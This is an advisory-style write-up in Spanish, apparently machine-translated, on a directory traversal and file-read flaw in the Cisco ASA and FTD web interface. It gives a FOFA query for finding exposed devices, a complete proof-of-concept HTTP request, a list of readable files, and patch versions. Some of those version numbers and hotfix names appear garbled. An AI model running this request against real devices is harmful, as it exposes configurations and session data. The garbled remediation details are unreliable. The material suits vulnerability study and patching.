Descripción de la vulnerabilidad
El dispositivo de firewall Cisco Adaptive Security Appliance (ASA) y la interfaz de administración web del dispositivo Cisco Firepower Threat Defense (FTD) tienen vulnerabilidades de cruce de directorios no autorizadas y vulnerabilidades de lectura de archivos arbitrarios remotos, lo que permite a atacantes remotos no autorizados llevar a cabo ataques de cruce de directorios y lectura sensible. archivos en el sistema de destino. Esta vulnerabilidad no se puede utilizar para obtener acceso a archivos del sistema ASA o FTD o archivos del sistema operativo (SO) subyacente, por lo que solo se pueden leer los archivos en los directorios del sistema web, como archivos de configuración webvpn, información como marcadores , cookies web, parte del contenido web y URL de protocolo de transferencia de hipertexto.
Versión de impacto de vulnerabilidad
Recurrencia de la vulnerabilidad
Palabras clave de búsqueda FOFA:
/+CSCOE+/
POC se emite de la siguiente manera
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: webvpnlogin=1; webvpnLang=en
Se pueden leer los siguientes archivos
"sess_update.html"
"blank.html"
"noportal.html"
"portal_ce.html"
"portal.html"
"logon_custom.css"
"svc.html"
"logo.gif"
"portal_inc.lua"
"nostcaccess.html"
"session.js"
"portal.js"
"portal_custom.css"
"running.conf"
"tlbrportal_forms.js"
"logon_forms.js"
"win.js"
"portal.css"
"lced.html"
"pluginlib.js"
"useralert.html"
"ping.html"
"app_index.html"
"shshimdo_url"
"session_password.html"
"relayjar.html"
"relayocx.html"
"color_picker.js"
"color_picker.html"
"cedhelp.html"
"cedmain.html"
"cedlogon.html"
"cedportal.html"
"portal_elements.html"
"commonspawn.js"
"common.js"
"appstart.js"
"relaymonjar.html"
"relaymonocx.html"
"cedsave.html"
"tunnel_linux.jnlp"
"ask.html"
"no_svc.html"
"preview.html"
"cedf.html"
"ced.html"
"logon_redirect.html"
"logout.html"
"tunnel_mac.jnlp"
"gp-gip.html"
"auth.html"
"wrong_url.html"
"logon.html"
Opiniones de reparación
Cisco ASA
Actualizar a una versión de reparación antes de la versión
9.6 actualizar a 9.6.4.42 versión
9.7 actualizar a una versión de reparación
9.8 actualizar a 9.8.420 versión
9.9 actualizar a 9.9.2.74 versión
9.10 actualizar a 9.10.1.42 versión
9.12 Actualizar a 9.12. 3.12 Versión
9.13 Actualización de la versión a 9.13.1.10 Versión
9.14 Actualización de la versión a la versión 9.14.1.10
Cisco FTD:
Actualización de la versión 6.2.2 a una versión de reparación
6.2.3 actualización a la versión
6.2.3.16 6.3.0 actualización a 6.3.0.5 (Hot Fix) /6.3.0.6/6.4.0.9 (Hot Fix) / versión6.6.0.1
Actualización desde Versión 6.4.0 a 6.4.0.9 (Hot Fix) /6.4.0.10 versión
6.5.0 actualización a 6.5.0.4 (Hot Fix) /6.5.0.5/6.6.0.1 versión 6.6.0
actualización a la versión 6.6.0.1
Cisco FTD Detalles de Hot Fix:
6.3.0.5:
Cisco_FTD_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_AV-6.3.0.6-3.sh.REL.tar
6.4.0.9:
Cisco_FTD_Hotfix_ .0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_Hotfix_BM-6.4.0.10-2.sh.REL.tar
6.5 .0.4:
Cisco_FTD_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP-6.5.0.5-3_. sh.REL.tar
Para actualizar sh.REL.tar a la versión reparada de Cisco FTD, los clientes pueden realizar una de las siguientes operaciones:
Para dispositivos que utilizan Cisco Firepower Management Center (FMC), utilice la interfaz FMC para instalar y actualizar. Una vez completada la instalación, vuelva a aplicar la política de control de acceso.
Para dispositivos que utilizan Cisco Firepower Device Manager (FDM), utilice la interfaz FDM para instalar y actualizar. Una vez completada la instalación, vuelva a aplicar la política de control de acceso.